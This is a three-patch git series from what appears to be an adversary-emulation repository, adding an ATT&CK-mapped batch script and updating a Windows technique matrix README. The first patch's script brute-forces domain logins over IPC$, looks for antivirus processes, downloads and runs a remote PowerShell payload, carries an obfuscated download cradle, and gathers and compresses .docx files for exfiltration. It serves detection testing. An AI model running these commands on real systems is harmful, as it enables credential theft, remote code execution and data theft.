From 1cf1cdd27970f2943adf3060264b040874ed4261 Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 16 Jan 2018 08:59:22 -0700 Subject: [PATCH 1/3] Reactor Chain Reaction Chain Reaction - Reactor --- .../chain_reaction_Reactor.bat | 54 +++++++++++++++++++ .../Discovery/System_Owner-User_Discovery.md | 8 +++ 2 files changed, 62 insertions(+) create mode 100644 ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat diff --git a/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat new file mode 100644 index 00000000..602e36be --- /dev/null +++ b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat 
@@ -0,0 +1,54 @@
+:: Chain Reaction - Reactor
+::
+::
+
+:: Tactic: Discovery
+:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
+
+:: Single Endpoint
+
+:: for /F “tokens=1,2” %i in (‘qwinsta /server: ^| findstr “Active Disc”‘) do @echo %i | find /v “#” | find /v “console” || echo %j > usernames.txt
+
+:: Multiple Endpoints
+
+@FOR /F %n in (computers.txt) DO @FOR /F “tokens=1,2” %i in (‘qwinsta /server:%n ^| findstr “Active Disc”’) do @echo %i | find /v “#” | find /v “console” || echo %j > usernames.txt
+
+
+:: Tactic: Credential Access, Lateral Movement
+:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
+:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
+
+@FOR /F %n in (usernames.txt) DO @FOR /F %p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
+
+
+:: Tactic: Discovery
+:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
+
+netsh.exe advfirewall firewall show all profiles
+
+tasklist.exe | findstr cb
+
+tasklist.exe | findstr virus
+
+tasklist.exe | findstr defender
+
+:: Tactic: Execution, Discovery
+:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
+:: Technique: Multiple Discovery
+
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
+
+:: Tactic: Execution
+:: Technique: Powershell: https://attack.mitre.org/wiki/Technique/T1086
+
+:: cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
+
+:: Tactic: Collection
+:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
+
+for /R c: %f in (*.docx) do copy %f c:\temp\
+
+:: Tactic: Exfiltration
+:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
+
+powershell.exe dir c:\temp -Recurse | Compress-Archive -DestinationPath C:\temp\allthedataz.zip
diff --git a/Windows/Discovery/System_Owner-User_Discovery.md b/Windows/Discovery/System_Owner-User_Discovery.md
index 98f4110f..f8c6557e 100644
--- a/Windows/Discovery/System_Owner-User_Discovery.md
+++ b/Windows/Discovery/System_Owner-User_Discovery.md
@@ -29,3 +29,11 @@ Remote: Local: qwinsta.exe + +Single Endpoint + + for /F “tokens=1,2” %i in (‘qwinsta /server: ^| findstr “Active Disc”‘) do @echo %i | find /v “#” | find /v “console” || echo %j > usernames.txt + +Multiple Endpoints + + @FOR /F %n in (computers.txt) DO @FOR /F “tokens=1,2” %i in (‘qwinsta /server:%n ^| findstr “Active Disc”’) do @echo %i | find /v “#” | find /v “console” || echo %j > usernames.txt
From 382d6313a3ffb14fdf46801a7b6e4159a420dd8b Mon Sep 17 00:00:00 2001
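Review bot: The two empty `::` lines under `:: Chain Reaction - Reactor` leave the script without the header an emulation artifact needs: it reads computers.txt, usernames.txt and passwords.txt from the working directory, writes usernames.txt, copies every *.docx on c: into c:\temp\ and produces C:\temp\allthedataz.zip, and `COMPANYDC1`/`COMPANY` are placeholders that must be edited before a run. Please fill the header with a one-line purpose, the input files, the artifacts left on disk and a cleanup step (`del usernames.txt` plus removal of the copied documents and the archive) so a detection test can be reverted. The PowerShell line that fetches Windows/Payloads/Discovery.bat from the repo's `master` branch executes whatever that branch holds at run time; pin the URL to a commit SHA (or vendor the payload next to this file) so the emulation is reproducible and the content that runs is the content that was reviewed. The two `for /F` lines also carry typographic quotes (“ ” ‘ ’) rather than ASCII `"` and `'`, which cmd.exe does not treat as quoting, and the same pasted text appears in the System_Owner-User_Discovery.md hunk of this commit.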
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 16 Jan 2018 10:10:52 -0700 Subject: [PATCH 2/3] Windows Matrix Update Windows Matrix update + also fixed Dir names/paths --- ...ntial Dumping.md => Credential_Dumping.md} | 0 ...Deobfuscate_Decode_Files_Or_Information.md | 0 .../File_Deletion.md | 0 .../Indicator_Removal_on_Host.md | 0 .../Timestomp.md | 0 .../Windows_Admin_Shares.md} | 0 .../Windows_Remote_Management.md} | 0 ...Service_Installation.md => New_Service.md} | 0 .../Bypass_User_Account_Control.md | 0 .../Process_Injection.md} | 0 Windows/README.md | 80 ++++++++++--------- 11 files changed, 42 insertions(+), 38 deletions(-) rename Windows/Credential_Access/{Credential Dumping.md => Credential_Dumping.md} (100%) rename Windows/{Defense Evasion => Defense_Evasion}/Deobfuscate_Decode_Files_Or_Information.md (100%) rename Windows/{Defense Evasion => Defense_Evasion}/File_Deletion.md (100%) rename Windows/{Defense Evasion => Defense_Evasion}/Indicator_Removal_on_Host.md (100%) rename Windows/{Defense Evasion => Defense_Evasion}/Timestomp.md (100%) rename Windows/{Lateral Movement/Windows Admin Shares.md => Lateral_Movement/Windows_Admin_Shares.md} (100%) rename Windows/{Lateral Movement/Windows Remote Management.md => Lateral_Movement/Windows_Remote_Management.md} (100%) rename Windows/Persistence/{Service_Installation.md => New_Service.md} (100%) rename Windows/{Privilege Escalation => Privilege_Escalation}/Bypass_User_Account_Control.md (100%) rename Windows/{Privilege Escalation/DLL Injection.md => Privilege_Escalation/Process_Injection.md} (100%) diff --git a/Windows/Credential_Access/Credential Dumping.md b/Windows/Credential_Access/Credential_Dumping.md similarity index 100% rename from Windows/Credential_Access/Credential Dumping.md rename to Windows/Credential_Access/Credential_Dumping.md 
diff --git a/Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md b/Windows/Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md similarity index 100% rename from Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md rename to Windows/Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md diff --git a/Windows/Defense Evasion/File_Deletion.md b/Windows/Defense_Evasion/File_Deletion.md similarity index 100% rename from Windows/Defense Evasion/File_Deletion.md rename to Windows/Defense_Evasion/File_Deletion.md diff --git a/Windows/Defense Evasion/Indicator_Removal_on_Host.md b/Windows/Defense_Evasion/Indicator_Removal_on_Host.md similarity index 100% rename from Windows/Defense Evasion/Indicator_Removal_on_Host.md rename to Windows/Defense_Evasion/Indicator_Removal_on_Host.md diff --git a/Windows/Defense Evasion/Timestomp.md b/Windows/Defense_Evasion/Timestomp.md similarity index 100% rename from Windows/Defense Evasion/Timestomp.md rename to Windows/Defense_Evasion/Timestomp.md diff --git a/Windows/Lateral Movement/Windows Admin Shares.md b/Windows/Lateral_Movement/Windows_Admin_Shares.md similarity index 100% rename from Windows/Lateral Movement/Windows Admin Shares.md rename to Windows/Lateral_Movement/Windows_Admin_Shares.md diff --git a/Windows/Lateral Movement/Windows Remote Management.md b/Windows/Lateral_Movement/Windows_Remote_Management.md similarity index 100% rename from Windows/Lateral Movement/Windows Remote Management.md rename to Windows/Lateral_Movement/Windows_Remote_Management.md diff --git a/Windows/Persistence/Service_Installation.md b/Windows/Persistence/New_Service.md similarity index 100% rename from Windows/Persistence/Service_Installation.md rename to Windows/Persistence/New_Service.md 
diff --git a/Windows/Privilege Escalation/Bypass_User_Account_Control.md b/Windows/Privilege_Escalation/Bypass_User_Account_Control.md similarity index 100% rename from Windows/Privilege Escalation/Bypass_User_Account_Control.md rename to Windows/Privilege_Escalation/Bypass_User_Account_Control.md diff --git a/Windows/Privilege Escalation/DLL Injection.md b/Windows/Privilege_Escalation/Process_Injection.md similarity index 100% rename from Windows/Privilege Escalation/DLL Injection.md rename to Windows/Privilege_Escalation/Process_Injection.md diff --git a/Windows/README.md b/Windows/README.md index 3cf59f94..9c65c158 100644 --- a/Windows/README.md +++ b/Windows/README.md 
@@ -1,40 +1,44 @@ ## MITRE ATT&CK Matrix - Windows -| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | -|-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| -| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | -| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | -| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create_Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | [Clipboard Data](Collection/Clipboard_Data.md) | Data Encrypted | Connection Proxy | -| Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential 
Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | -| Bootkit | Bypass User Account Control | Component Firmware | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | -| [Change Default File Association](Persistence/Change_Default_File_Association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | -| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Input Capture](Collection/Input_Capture.md) | Permission Groups Discovery | Remote File Copy | [PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | -| Component Object Model Hijacking | Exploitation of Vulnerability | DLL Search Order Hijacking | Network Sniffing | Process Discovery | Remote Services | Process Hollowing | Email Collection | Exfiltration Over Physical Medium | Fallback Channels | -| DLL Search Order Hijacking | File System Permissions Weakness | DLL Side-Loading | Private Keys | [Query Registry](Discovery/Query_Registry.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | Scheduled Transfer | Multi-Stage Channels | -| External Remote Services | Local Port Monitor | [Deobfuscate - Decode Files or 
Information](Defense%20Evasion/Deobfuscate_Decode_Files_Or_Information.md) | Two-Factor Authentication Interception | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Screen Capture | | Multiband Communication | -| File System Permissions Weakness | [New Service](Persistence/Service_Installation.md) | Disabling Security Tools | | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Taint Shared Content | Rundll32 | Video Capture | | Multilayer Encryption | -| Hidden Files and Directories | Path Interception | Exploitation of Vulnerability | | [System Information Discovery](Discovery/System_Information_Discovery.md) | Third-party Software | [Scheduled Task](Persistence/Scheduled_Task.md) | | | Remote File Copy | -| Hypervisor | [Scheduled Task](Persistence/Scheduled_Task.md) | [File Deletion](Defense%20Evasion/File_Deletion.md) | | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | [Windows Admin Shares](Lateral%20Movement/Windows%20Admin%20Shares.md) | Scripting | | | Standard Application Layer Protocol | -| Local Port Monitor | Service Registry Permissions Weakness | File System Logical Offsets | | System Network Connections Discovery | Windows Remote Management | Service Execution | | | Standard Cryptographic Protocol | -| Logon Scripts | Valid Accounts | Hidden Files and Directories | | [System Owner/User Discovery](Discovery/System_Owner-User_Discovery.md) | | Third-party Software | | | Standard Non-Application Layer Protocol | -| Modify Existing Service | Web Shell | Indicator Blocking | | [System Service Discovery](Discovery/System_Service_Discovery.md) | | Trusted Developer Utilities | | | Uncommonly Used Port | -| [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Indicator Removal from Tools | | [System Time Discovery](Discovery/System_Time_Discovery.md) | | [Windows Management 
Instrumentation](Execution/Windows_Management_Instrumentation.md) | | | Web Service | -| New Service | | [Indicator Removal on Host](Defense%20Evasion/Indicator_Removal_on_Host.md) | | | | [Windows Remote Management](Lateral%20Movement/Windows%20Remote%20Management.md) | | | | -| [Office Application Startup](Persistence/Office_Application_Startup.md) | | Install Root Certificate | | | | [Bitsadmin](Execution/Bitsadmin.md) | | | | -| Path Interception | | [InstallUtil](Execution/InstallUtil.md) | | | | | | | | -| Redundant Access | | Masquerading | | | | | | | | -| [Registry Run Keys / Start Folder](Persistence/Registry_Run_Keys_Start_folder.md) | | Modify Registry | | | | | | | | -| Scheduled Task | | NTFS Extended Attributes | | | | | | | | -| Security Support Provider | | Network Share Connection Removal | | | | | | | | -| Service Registry Permissions Weakness | | Obfuscated Files or Information | | | | | | | | -| Shortcut Modification | | Process Hollowing | | | | | | | | -| System Firmware | | Redundant Access | | | | | | | | -| Valid Accounts | | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | | | | | | | | -| Web Shell | | [Regsvr32](Execution/Regsvr32.md) | | | | | | | | -| [Windows Management Instrumentation Event Subscription](Persistence/Windows_Management_Instrumentation_Event_Subscription.md) | | Rootkit | | | | | | | | -| Winlogon Helper DLL | | [Rundll32](Execution/Rundll32.md) | | | | | | | | -| | | Scripting | | | | | | | | -| | | Software Packing | | | | | | | | -| | | [Timestomp](Defense%20Evasion/Timestomp.md) | | | | | | | | -| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | | -| | | Valid Accounts | | | | | | | | +| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | 
+|-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| +| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | +| AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | Dynamic Data Exchange | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | +| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | Browser Extensions | Data Encrypted | Connection Proxy | +| [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | Logon Scripts | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol | +| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | 
Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | +| Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | +| Browser Extensions | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | Mshta | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | +| Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels | +| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | Disabling Security Tools | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | +| [Create Account](Credential_Access/Create_Account.md) | Hooking | Exploitation of Vulnerability | Password Filter DLL | [Security Software 
Discovery](Discovery/Security_Software_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Man in the Browser | | Multi-hop Proxy | +| DLL Search Order Hijacking | Image File Execution Options Injection | Extra Window Memory Injection | Private Keys | [System Information Discovery](Discovery/System_Information_Discovery.md) | Taint Shared Content | [Rundll32](Execution/rundll32.md) | Screen Capture | | Multiband Communication | +| External Remote Services | [New Service](Persistence/New_Service.md) | [File Deletion](Defense_Evasion/File_Deletion.md) | Replication Through Removable Media | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | Third-party Software | Scheduled Task | Video Capture | | Multilayer Encryption | +| File System Permissions Weakness | Path Interception | File System Logical Offsets | Two-Factor Authentication Interception | System Network Connections Discovery | [Windows Admin Shares](Lateral_Movement/Windows_Admin_Shares.md) | Scripting | | | Remote File Copy | +| Hidden Files and Directories | Port Monitors | Hidden Files and Directories | | [System Owner/User Discovery](Discovery/System_Owner-User_Discovery.md) | [Windows Remote Management](Lateral_Movement/Windows_Remote_Management.md) | Service Execution | | | Standard Application Layer Protocol | +| Hooking | Process Injection](Privilege_Escalation/Process_Injection.md) | Image File Execution Options Injection | | [System Service Discovery](Discovery/System_Service_Discovery.md) | | Third-party Software | | | Standard Cryptographic Protocol | +| Hypervisor | SID-History Injection | Indicator Blocking | | [System Time Discovery](Discovery/System_Time_Discovery.md) | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | Standard Non-Application Layer Protocol | +| Image File Execution Options Injection | [Scheduled Task](Persistence/Scheduled_Task.md) | Indicator Removal from Tools | | | | [Windows 
Management Instrumentation](Execution/Windows_Management_Instrumentation.md) | | | Uncommonly Used Port | +| LSASS Driver | Service Registry Permissions Weakness | [Indicator Removal on Host](Defense_Evasion/Indicator_Removal_on_Host.md) | | | | Windows Remote Management | | | Web Service | +| Logon Scripts | Valid Accounts | Install Root Certificate | | | | | | | | +| Modify Existing Service | Web Shell | InstallUtil | | | | | | | | +| [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Masquerading | | | | | | | | +| [New Service](Persistence/New_Service.md) | | Modify Registry | | | | | | | | +| [Office Application Startup](Persistence/Office_Application_Startup.md) | | Mshta | | | | | | | | +| Path Interception | | NTFS Extended Attributes | | | | | | | | +| Port Monitors | | Network Share Connection Removal | | | | | | | | +| Redundant Access | | Obfuscated Files or Information | | | | | | | | +| [Registry Run Keys / Start Folder](Persistence/Registry_Run_Keys_Start_folder.md) | | Process Doppelgänging | | | | | | | | +| [Scheduled Task](Persistence/Scheduled_Task.md) | | Process Hollowing | | | | | | | | +| Screensaver | | [Process Injection](Privilege_Escalation/Process_Injection.md) | | | | | | | | +| Security Support Provider | | Redundant Access | | | | | | | | +| Service Registry Permissions Weakness | | Regsvcs/Regasm | | | | | | | | +| Shortcut Modification | | Regsvr32 | | | | | | | | +| System Firmware | | Rootkit | | | | | | | | +| Valid Accounts | | Rundll32 | | | | | | | | +| Web Shell | | Scripting | | | | | | | | +| [Windows Management Instrumentation Event Subscription](Persistence/Windows_Management_Instrumentation_Event_Subscription.md) | | Software Packing | | | | | | | | +| Winlogon Helper DLL | | [Timestomp](Defense_Evasion/Timestomp.md) | | | | | | | | +| | | Trusted Developer Utilities | | | | | | | | +| | | Valid Accounts | | | | | | | | From a5d7e40120470a0671c14e0a9571857d7e4cc8ad Mon Sep 17 00:00:00 2001 
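Review bot: The Privilege Escalation cell `| Hooking | Process Injection](Privilege_Escalation/Process_Injection.md) |` is missing its opening `[`, so it renders as literal text instead of a link; it should read `| Hooking | [Process Injection](Privilege_Escalation/Process_Injection.md) |`. The Execution column's `[Rundll32](Execution/rundll32.md)` changes the target from the previous `Execution/Rundll32.md` to a lowercase file name, and this commit's rename list does not include that file, so the link will break on a case-sensitive checkout and on the GitHub web view unless the file is renamed as well. Several cells that were links before (Accessibility Features, AppInit DLLs and Application Shimming under Privilege Escalation, Scheduled Task under Execution) are now plain text; if that is deliberate de-duplication of cross-tactic links, the commit message should say so.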
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 16 Jan 2018 10:22:36 -0700 Subject: [PATCH 3/3] Mshta Add --- Windows/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Windows/README.md b/Windows/README.md index 9c65c158..590e0eb0 100644 --- a/Windows/README.md +++ b/Windows/README.md 
@@ -9,7 +9,7 @@ | [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | | Browser Extensions | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | -| [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | Mshta | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | +| [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | | Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels | | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File 
System Permissions Weakness | Disabling Security Tools | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | | [Create Account](Credential_Access/Create_Account.md) | Hooking | Exploitation of Vulnerability | Password Filter DLL | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Man in the Browser | | Multi-hop Proxy | @@ -25,7 +25,7 @@ | Modify Existing Service | Web Shell | InstallUtil | | | | | | | | | [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Masquerading | | | | | | | | | [New Service](Persistence/New_Service.md) | | Modify Registry | | | | | | | | -| [Office Application Startup](Persistence/Office_Application_Startup.md) | | Mshta | | | | | | | | +| [Office Application Startup](Persistence/Office_Application_Startup.md) | | [Mshta](Execution/Mshta.md) | | | | | | | | | Path Interception | | NTFS Extended Attributes | | | | | | | | | Port Monitors | | Network Share Connection Removal | | | | | | | | | Redundant Access | | Obfuscated Files or Information | | | | | | | |